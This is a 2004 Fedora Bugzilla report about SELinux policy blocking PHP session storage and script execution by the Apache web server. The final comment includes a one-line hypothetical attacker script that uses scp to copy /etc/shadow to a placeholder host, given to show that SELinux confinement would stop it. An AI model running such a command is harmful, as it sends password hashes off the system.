Bug 121063
Summary: | php session management in enforcing mode | ||
---|---|---|---|
Product: | [Fedora] Fedora | Reporter: | Tim Waugh <twaugh> |
Component: | php | Assignee: | Joe Orton <jorton> |
Status: | CLOSED CURRENTRELEASE | QA Contact: | David Lawrence <dkl> |
Severity: | medium | Docs Contact: | |
Priority: | medium | ||
Version: | rawhide | CC: | dwalsh, wtogami |
Target Milestone: | --- | ||
Target Release: | --- | ||
Hardware: | All | ||
OS: | Linux | ||
Whiteboard: | |||
Fixed In Version: | Doc Type: | Bug Fix | |
Doc Text: | Story Points: | --- | |
Clone Of: | Environment: | ||
Last Closed: | 2004-11-22 11:59:07 UTC | Type: | --- |
Regression: | --- | Mount Type: | --- |
Documentation: | --- | CRM: | |
Verified Versions: | Category: | --- | |
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
Cloudforms Team: | --- | Target Upstream Version: | |
Embargoed: |
Description
Tim Waugh
2004-04-16 17:01:27 UTC
Is SELinux going to get in the way even for the "unprivileged" httpd children running setuid apache? This is painful. httpd, when running as the 'apache' user, needs to have permissions to do whatever it likes in /var/lib/php/session/. This can be added to the policy. This particular webapp also needs write access to /var/www/html/, but that's not something which can go in the policy; in general, you *don't* want the web server to have write acccess to the web content. Except when you do. So this is something the server admin needs to configure, I guess. The /var/lib/php/session policy was changed, so this bug can be closed. However, gallery is still a long way from working since it uses system() in the install scripts. Joe, How can I test and fix this? Dan Unless you want to allow httpd to exec /bin/bash in the default policy (which I would guess defeats the point of having SELinux on by default) you can't fix this. No allowing it to exec bash does not necessarily open you to a great deal of problems. You would still be running in the httpd context. So even if a hacker broke into apache and got it to run a shell #!/bin/sh scp /etc/shadow MYHOST It would fail because httpd_t is not allowed to access /etc/shadow. |